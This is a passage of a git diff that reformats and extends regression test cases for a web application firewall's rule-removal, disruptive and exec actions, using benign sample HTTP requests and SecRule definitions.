"debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action...", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json index 6cf2923d58..ff48851a1b 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json @@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '2'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=tag123\"", "SecRule ARGS \"@contains test1\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test2\" \"id:2,pass,t:trim,tag:tag123\"", @@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '3'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=whee\"", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json index fce492bbac..ef9bd826f8 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json @@ -1,167 +1,223 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (1)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (3)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", - "Referer": "This is an attack" + "Referer": "This is an attack", + "Content-Length": "0" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", - "referer": "This is an attack" + "referer": "This is an attack", + "Content-Length": "0" + }, + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json index fc696a5cb0..aba3df98b0 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json @@ -1,99 +1,134 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (1)", - "expected":{ - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" + }, + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (3)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-disruptive.json b/test/test-cases/regression/action-disruptive.json index da39b1c3bc..93c2d32cd8 100644 --- a/test/test-cases/regression/action-disruptive.json +++ b/test/test-cases/regression/action-disruptive.json @@ -1,78 +1,234 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (1/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (1/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":403 + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'900001',phase:request,nolog,status:403,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (2/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (2/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":404 + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (3/n)", - "expected":{ - "http_code":404 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (3/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,block,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (4/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (4/n)", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,nolog,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (5/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (5/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] }, - "rules":[ + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,pass,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (6/n)", - "expected":{ - "http_code":403 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (6/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,drop,nolog,t:none\"" ] diff --git a/test/test-cases/regression/action-exec.json b/test/test-cases/regression/action-exec.json index 80661114e0..c6fe77d09d 100644 --- a/test/test-cases/regression/action-exec.json +++ b/test/test-cases/regression/action-exec.json @@ -1,148 +1,162 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (1/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"", - "parser_error":"exec: Expecting a Lua script: /bin/ech" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200, + "parser_error": "exec: Expecting a Lua script: /bin/ech" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,exec:/bin/echo\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - 